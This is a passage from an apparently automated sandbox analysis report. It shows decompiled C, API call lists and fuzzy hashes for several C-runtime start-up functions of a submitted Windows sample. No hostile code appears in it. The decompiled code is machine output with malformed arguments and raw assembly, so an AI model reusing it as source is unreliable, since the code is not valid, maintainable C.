
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040469E), ref: 00405564
                                                                  • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040469E), ref: 00405578
                                                                  • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040469E), ref: 004055A4
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040469E), ref: 004055DC
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040469E), ref: 004055FE
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,0040469E), ref: 00405617
                                                                  • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040469E), ref: 0040562A
                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00405668
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                  • String ID:
                                                                  • API String ID: 1823725401-0
                                                                  • Opcode ID: 512b78eee1b38ad68be95b93393e145d5773af8ac6a2ee1f5b8759a0cfd0570a
                                                                  • Instruction ID: 0f0d003f9df99cce2dedfed6e8948c7de33e0823880adbfc4b8bffa689cd1c0c
                                                                  • Opcode Fuzzy Hash: 512b78eee1b38ad68be95b93393e145d5773af8ac6a2ee1f5b8759a0cfd0570a
                                                                  • Instruction Fuzzy Hash: 333126B29046196FE7307F749C8883F769CEA49344795093BF54AF3281E63B4C418EAE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040489D Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 78%
                                                                  			E0040489D(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x42bb70);
				_push(E00405B04);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x42fe3c; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x430014; // 0x0
								_a20 = _t44;
							}
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E00406060(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E00404560(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x430004; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x42bb68, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x42bb64, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x42fe3c = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}





















                                                                  0x004048a0
                                                                  0x004048a2
                                                                  0x004048a7
                                                                  0x004048b2
                                                                  0x004048b3
                                                                  0x004048ba
                                                                  0x004048c0
                                                                  0x004048c3
                                                                  0x004048cc
                                                                  0x0040490c
                                                                  0x0040490f
                                                                  0x00404938
                                                                  0x00000000
                                                                  0x0040493e
                                                                  0x00404941
                                                                  0x00404943
                                                                  0x00404948
                                                                  0x00404948
                                                                  0x00404958
                                                                  0x00404962
                                                                  0x00404968
                                                                  0x0040496d
                                                                  0x00000000
                                                                  0x0040496f
                                                                  0x0040496f
                                                                  0x0040497c
                                                                  0x00404981
                                                                  0x00404984
                                                                  0x00404986
                                                                  0x0040498c
                                                                  0x004049a1
                                                                  0x004049a7
                                                                  0x00000000
                                                                  0x004049a9
                                                                  0x004049b8
                                                                  0x004049c0
                                                                  0x00000000
                                                                  0x004049c2
                                                                  0x004049ca
                                                                  0x004049ca
                                                                  0x004049c0
                                                                  0x004049a7
                                                                  0x0040496d
                                                                  0x00404911
                                                                  0x00404911
                                                                  0x00404916
                                                                  0x00404918
                                                                  0x00404918
                                                                  0x0040492a
                                                                  0x0040492a
                                                                  0x004048ce
                                                                  0x004048d1
                                                                  0x004048d4
                                                                  0x004048e4
                                                                  0x004048fe
                                                                  0x004049d2
                                                                  0x004049d2
                                                                  0x00404904
                                                                  0x00404906
                                                                  0x00000000
                                                                  0x00404906
                                                                  0x004048e6
                                                                  0x004048e6
                                                                  0x00404907
                                                                  0x00404907
                                                                  0x00000000
                                                                  0x00404907
                                                                  0x004048e4
                                                                  0x004049da
                                                                  0x004049e5

                                                                  APIs
                                                                  • GetStringTypeW.KERNEL32(00000001,0042BB68,00000001,?,766870F0,004303CC,?,?,004047B3,?,?,?,00000000,00000001), ref: 004048DC
                                                                  • GetStringTypeA.KERNEL32(00000000,00000001,0042BB64,00000001,?,?,004047B3,?,?,?,00000000,00000001), ref: 004048F6
                                                                  • GetStringTypeA.KERNEL32(?,?,?,?,004047B3,766870F0,004303CC,?,?,004047B3,?,?,?,00000000,00000001), ref: 0040492A
                                                                  • MultiByteToWideChar.KERNEL32(?,004303CD,?,?,00000000,00000000,766870F0,004303CC,?,?,004047B3,?,?,?,00000000,00000001), ref: 00404962
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,004047B3,?), ref: 004049B8
                                                                  • GetStringTypeW.KERNEL32(?,?,00000000,004047B3,?,?,?,?,?,?,004047B3,?), ref: 004049CA
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: StringType$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 3852931651-0
                                                                  • Opcode ID: 88c8aab0c1c08593b6218541c5dbe37ccd88046cf707c9e396c2f68d330452d1
                                                                  • Instruction ID: 8022d9dc23f8c699f5fd285d40b3dbae803401d7c92204790a7a972636fff166
                                                                  • Opcode Fuzzy Hash: 88c8aab0c1c08593b6218541c5dbe37ccd88046cf707c9e396c2f68d330452d1
                                                                  • Instruction Fuzzy Hash: 0E4193B1600219AFCF108FA4DD45EAF7F79FB45710F104436FA01E2290C3399961CB99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405864 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 91%
                                                                  			E00405864(void* __ecx, void* __eflags) {
				char _v8;
				struct _OSVERSIONINFOA _v156;
				char _v416;
				char _v4656;
				void* _t24;
				CHAR* _t32;
				void* _t33;
				intOrPtr* _t34;
				void* _t35;
				char _t36;
				char _t38;
				void* _t40;
				char* _t44;
				char* _t45;
				char* _t50;

				E00406060(0x122c, __ecx);
				_v156.dwOSVersionInfoSize = 0x94;
				if(GetVersionExA( &_v156) != 0 && _v156.dwPlatformId == 2 && _v156.dwMajorVersion >= 5) {
					_t40 = 1;
					return _t40;
				}
				if(GetEnvironmentVariableA("__MSVCRT_HEAP_SELECT",  &_v4656, 0x1090) == 0) {
					L28:
					_t24 = E00405837( &_v8);
					asm("sbb eax, eax");
					return _t24 + 3;
				}
				_t44 =  &_v4656;
				if(_v4656 != 0) {
					do {
						_t38 =  *_t44;
						if(_t38 >= 0x61 && _t38 <= 0x7a) {
							 *_t44 = _t38 - 0x20;
						}
						_t44 = _t44 + 1;
					} while ( *_t44 != 0);
				}
				if(E00407310("__GLOBAL_HEAP_SELECTED",  &_v4656, 0x16) != 0) {
					GetModuleFileNameA(0,  &_v416, 0x104);
					_t45 =  &_v416;
					if(_v416 != 0) {
						do {
							_t36 =  *_t45;
							if(_t36 >= 0x61 && _t36 <= 0x7a) {
								 *_t45 = _t36 - 0x20;
							}
							_t45 = _t45 + 1;
						} while ( *_t45 != 0);
					}
					_t32 = E00407290( &_v4656,  &_v416);
				} else {
					_t32 =  &_v4656;
				}
				if(_t32 == 0) {
					goto L28;
				}
				_t33 = E004071D0(_t32, 0x2c);
				if(_t33 == 0) {
					goto L28;
				}
				_t34 = _t33 + 1;
				_t50 = _t34;
				if( *_t34 != 0) {
					do {
						if( *_t50 != 0x3b) {
							_t50 = _t50 + 1;
						} else {
							 *_t50 = 0;
						}
					} while ( *_t50 != 0);
				}
				_t35 = E00403B88(_t34, 0, 0xa);
				if(_t35 != 2 && _t35 != 3 && _t35 != 1) {
					goto L28;
				}
				return _t35;
			}


















                                                                  0x0040586c
                                                                  0x00405879
                                                                  0x0040588b
                                                                  0x004058a1
                                                                  0x00000000
                                                                  0x004058a1
                                                                  0x004058c0
                                                                  0x00405996
                                                                  0x0040599a
                                                                  0x004059a4
                                                                  0x00000000
                                                                  0x004059a6
                                                                  0x004058c8
                                                                  0x004058d4
                                                                  0x004058d6
                                                                  0x004058d6
                                                                  0x004058da
                                                                  0x004058e2
                                                                  0x004058e2
                                                                  0x004058e4
                                                                  0x004058e5
                                                                  0x004058d6
                                                                  0x00405901
                                                                  0x00405918
                                                                  0x00405924
                                                                  0x0040592a
                                                                  0x0040592c
                                                                  0x0040592c
                                                                  0x00405930
                                                                  0x00405938
                                                                  0x00405938
                                                                  0x0040593a
                                                                  0x0040593b
                                                                  0x0040592c
                                                                  0x0040594d
                                                                  0x00405903
                                                                  0x00405903
                                                                  0x00405903
                                                                  0x00405956
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040595b
                                                                  0x00405964
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405966
                                                                  0x00405967
                                                                  0x0040596b
                                                                  0x0040596d
                                                                  0x00405970
                                                                  0x00405976
                                                                  0x00405972
                                                                  0x00405972
                                                                  0x00405972
                                                                  0x00405977
                                                                  0x0040596d
                                                                  0x0040597f
                                                                  0x0040598a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004059ab

                                                                  APIs
                                                                  • GetVersionExA.KERNEL32 ref: 00405883
                                                                  • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004058B8
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00405918
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentFileModuleNameVariableVersion
                                                                  • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                  • API String ID: 1385375860-4131005785
                                                                  • Opcode ID: 2d5ecbff4a76403c21d3aaf20bded1cdd859aadb085c6c002c40c632531511c4
                                                                  • Instruction ID: 64855e27e6ff0a1cdbe9c2d5c5398aa5343c9c148ff43395034f3d2f15cb978c
                                                                  • Opcode Fuzzy Hash: 2d5ecbff4a76403c21d3aaf20bded1cdd859aadb085c6c002c40c632531511c4
                                                                  • Instruction Fuzzy Hash: 8B316CB2905648ADEB3196745C41BDF3768DB02314F2440FBD485F92C2E63C9E99CF1A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040567B Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 99%
                                                                  			E0040567B() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = E0040707A(0x480);
				if(_t89 == 0) {
					E00404710(0x1b);
				}
				 *0x4303e0 = _t89;
				 *0x4304e0 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x4303e0; // 0x2310630
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x4303e0; // 0x2310630
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87);
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x4304e0);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x4304e0 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x4303e0[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x4303e4;
					while(1) {
						_t69 = E0040707A(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x4304e0 =  *0x4304e0 + 0x20;
						__eflags =  *0x4304e0;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x4304e0 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x4304e0; // 0x20
					goto L18;
				}
			}




























                                                                  0x0040568e
                                                                  0x00405693
                                                                  0x00405697
                                                                  0x0040569c
                                                                  0x0040569d
                                                                  0x004056a3
                                                                  0x004056ad
                                                                  0x004056ad
                                                                  0x004056b3
                                                                  0x004056b7
                                                                  0x004056bb
                                                                  0x004056be
                                                                  0x004056c2
                                                                  0x004056c6
                                                                  0x004056cb
                                                                  0x004056ce
                                                                  0x004056ce
                                                                  0x004056d9
                                                                  0x004056df
                                                                  0x004056e4
                                                                  0x004057bb
                                                                  0x004057bb
                                                                  0x004057bb
                                                                  0x004057bd
                                                                  0x004057bd
                                                                  0x004057c3
                                                                  0x004057c6
                                                                  0x004057ca
                                                                  0x004057cd
                                                                  0x0040581c
                                                                  0x0040581c
                                                                  0x0040581c
                                                                  0x00000000
                                                                  0x0040581c
                                                                  0x004057cf
                                                                  0x004057d1
                                                                  0x004057d5
                                                                  0x004057e1
                                                                  0x004057e3
                                                                  0x004057e3
                                                                  0x004057d7
                                                                  0x004057d9
                                                                  0x004057d9
                                                                  0x004057ed
                                                                  0x004057ef
                                                                  0x004057f2
                                                                  0x0040580b
                                                                  0x0040580b
                                                                  0x004057f4
                                                                  0x004057f5
                                                                  0x004057fb
                                                                  0x004057fd
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004057ff
                                                                  0x00405804
                                                                  0x00405806
                                                                  0x00405809
                                                                  0x00405811
                                                                  0x00405814
                                                                  0x00405816
                                                                  0x00405816
                                                                  0x00000000
                                                                  0x00405814
                                                                  0x00000000
                                                                  0x00405809
                                                                  0x00405820
                                                                  0x00405820
                                                                  0x00405821
                                                                  0x00405821
                                                                  0x00405836
                                                                  0x00405836
                                                                  0x004056ea
                                                                  0x004056ed
                                                                  0x004056ef
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004056f5
                                                                  0x004056f7
                                                                  0x004056fd
                                                                  0x00405705
                                                                  0x00405707
                                                                  0x00405709
                                                                  0x00405709
                                                                  0x0040570b
                                                                  0x00405711
                                                                  0x00405769
                                                                  0x00405769
                                                                  0x0040576b
                                                                  0x0040576d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040576f
                                                                  0x0040576f
                                                                  0x00405772
                                                                  0x00405774
                                                                  0x00405777
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405779
                                                                  0x0040577b
                                                                  0x0040577d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040577f
                                                                  0x00405781
                                                                  0x0040578e
                                                                  0x00405795
                                                                  0x00405795
                                                                  0x004057a2
                                                                  0x004057aa
                                                                  0x004057ae
                                                                  0x00000000
                                                                  0x004057ae
                                                                  0x00405784
                                                                  0x0040578a
                                                                  0x0040578c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004057b1
                                                                  0x004057b1
                                                                  0x004057b5
                                                                  0x004057b6
                                                                  0x004057b7
                                                                  0x004057b7
                                                                  0x00000000
                                                                  0x00405713
                                                                  0x00405713
                                                                  0x00405718
                                                                  0x0040571d
                                                                  0x00405722
                                                                  0x00405725
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405727
                                                                  0x00405727
                                                                  0x0040572e
                                                                  0x00405730
                                                                  0x00405730
                                                                  0x00405736
                                                                  0x00405736
                                                                  0x00405738
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040573a
                                                                  0x0040573e
                                                                  0x00405741
                                                                  0x00405745
                                                                  0x0040574b
                                                                  0x0040574e
                                                                  0x0040574e
                                                                  0x00405756
                                                                  0x00405759
                                                                  0x0040575f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405761
                                                                  0x00405763
                                                                  0x00000000
                                                                  0x00405763

                                                                  APIs
                                                                  • GetStartupInfoA.KERNEL32(?), ref: 004056D9
                                                                  • GetFileType.KERNEL32(?,?,00000000), ref: 00405784
                                                                  • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004057E7
                                                                  • GetFileType.KERNEL32(00000000,?,00000000), ref: 004057F5
                                                                  • SetHandleCount.KERNEL32 ref: 0040582C
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandleType$CountInfoStartup
                                                                  • String ID:
                                                                  • API String ID: 1710529072-0
                                                                  • Opcode ID: f7da9aeebfb57f826e6c950a3971fd1c27dc7d8d1e6c42433c50d4feb41abe62
                                                                  • Instruction ID: 6a144e193117df5335d73870dc3f63d4bdcd024428d4f3784e35262073f7fe4c
                                                                  • Opcode Fuzzy Hash: f7da9aeebfb57f826e6c950a3971fd1c27dc7d8d1e6c42433c50d4feb41abe62
                                                                  • Instruction Fuzzy Hash: 1C512532900A01CFD720DB38C99476B3BE0EB11328F24873ED9A6A73E0D7389845DB59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404A4D Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00404A4D() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x42d478);
				if(_t16 == 0) {
					_t16 = E0040608F(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x42d478, _t16) == 0) {
						E00404710(0x10);
					} else {
						E00404A3A(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}






                                                                  0x00404a5b
                                                                  0x00404a63
                                                                  0x00404a67
                                                                  0x00404a72
                                                                  0x00404a78
                                                                  0x00404aa2
                                                                  0x00404a8b
                                                                  0x00404a8c
                                                                  0x00404a92
                                                                  0x00404a98
                                                                  0x00404a9c
                                                                  0x00404a9c
                                                                  0x00404a78
                                                                  0x00404aa9
                                                                  0x00404ab3

                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000103,7FFFFFFF,0040475E,00403D56,00000000,?,?,00000000,00000001), ref: 00404A4F
                                                                  • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 00404A5D
                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 00404AA9
                                                                    • Part of subcall function 0040608F: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,00404A72,00000001,00000074,?,?,00000000,00000001), ref: 00406185
                                                                  • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 00404A81
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00404A92
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                  • String ID:
                                                                  • API String ID: 2020098873-0
                                                                  • Opcode ID: 1577851647a1b45e305c0231c52119fb173837cef2929389a6c3cff1a23be220
                                                                  • Instruction ID: a321404f3bafc762e8c27d6502229ed9b298acd2062d74cb15912e98bb78fdfe
                                                                  • Opcode Fuzzy Hash: 1577851647a1b45e305c0231c52119fb173837cef2929389a6c3cff1a23be220
                                                                  • Instruction Fuzzy Hash: B9F06271B413119FD7216F35BD0965A3A60AF81772B11013AF685F62E0CB3C88A54AAE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404B04 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 67%
                                                                  			E00404B04() {
				signed int _v12;
				signed long long _v20;
				signed long long _v28;
				void* _t10;
				struct HINSTANCE__* _t19;

				_t19 = GetModuleHandleA("KERNEL32");
				if(_t19 == 0) {
					L6:
					_v12 =  *0x42bb90;
					_v20 =  *0x42bb88;
					asm("fsubr qword [ebp-0x10]");
					_v28 = _v20 / _v12 * _v12;
					asm("fcomp qword [0x42bb80]");
					asm("fnstsw ax");
					asm("sahf");
					if(_t19 <= 0) {
						return 0;
					} else {
						_t10 = 1;
						return _t10;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}








                                                                  0x00404b0f
                                                                  0x00404b11
                                                                  0x00404b28
                                                                  0x00404ad2
                                                                  0x00404adb
                                                                  0x00404ae7
                                                                  0x00404aea
                                                                  0x00404af0
                                                                  0x00404af6
                                                                  0x00404af8
                                                                  0x00404af9
                                                                  0x00404b03
                                                                  0x00404afb
                                                                  0x00404afd
                                                                  0x00404aff
                                                                  0x00404aff
                                                                  0x00404b13
                                                                  0x00404b19
                                                                  0x00404b21
                                                                  0x00000000
                                                                  0x00404b23
                                                                  0x00404b23
                                                                  0x00404b27
                                                                  0x00404b27
                                                                  0x00404b21

                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,004045C2), ref: 00404B09
                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00404B19
                                                                  Strings
                                                                  Memory Dump Source
